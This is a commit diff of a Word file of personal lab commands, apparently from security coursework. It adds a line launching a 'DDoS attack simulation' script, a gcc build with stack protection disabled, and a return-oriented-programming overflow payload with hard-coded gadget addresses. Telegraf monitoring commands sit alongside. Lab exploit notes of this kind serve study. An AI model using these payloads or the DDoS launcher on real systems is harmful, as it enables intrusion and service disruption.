<commit_message>
Added Telegraf Conf files
</commit_message>
<xml_diff>
--- a/commands.docx
+++ b/commands.docx
@@ -2,6 +2,33 @@
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
 <w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16du wp14">
   <w:body>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="hljs-comment"/>
+        </w:rPr>
+        <w:t>// Execute the Python DDoS simulation script</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>system(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="hljs-string"/>
+        </w:rPr>
+        <w:t>"python3 ddos_attack_simulation.py &amp;"</w:t>
+      </w:r>
+      <w:r>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
     <w:p>
       <w:r>
         <w:t>Injection Attack:</w:t>
@@ -155,6 +182,530 @@
         <w:t>set $esp = $esp + 4</w:t>
       </w:r>
     </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>18-December 2024</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>gcc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -o rop2a rop2a.c -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>fno</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-stack-protector -z </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>execstack</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="nb-NO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="nb-NO"/>
+        </w:rPr>
+        <w:t>telegraf --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="nb-NO"/>
+        </w:rPr>
+        <w:t>config</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="nb-NO"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="nb-NO"/>
+        </w:rPr>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="nb-NO"/>
+        </w:rPr>
+        <w:t>/telegraf/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="nb-NO"/>
+        </w:rPr>
+        <w:t>telegraf.conf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="nb-NO"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --test</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="nb-NO"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>./</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">rop2a "$(python3 -c 'import sys; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>sys.stdout.buffer.write</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>b"A</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>"*108 +</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>b"BBBB</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>"+ b"\xd9\x61\x55\x56" + b"\x04\x62\x55\x56" + b"\x2f\x62\x55\x56" + b"\x40\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>xfa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>xdf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>\xf7")')"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>ps</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> aux | grep 'ddos_attack_simulation.py'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">kill </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>pid</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p/>
     <w:p/>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
@@ -763,6 +1314,7 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">
@@ -1099,6 +1651,16 @@
       <w:color w:val="605E5C"/>
       <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
     </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-comment">
+    <w:name w:val="hljs-comment"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:rsid w:val="00F91D4B"/>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
+    <w:name w:val="hljs-string"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:rsid w:val="00F91D4B"/>
   </w:style>
 </w:styles>
 </file>

</xml_diff>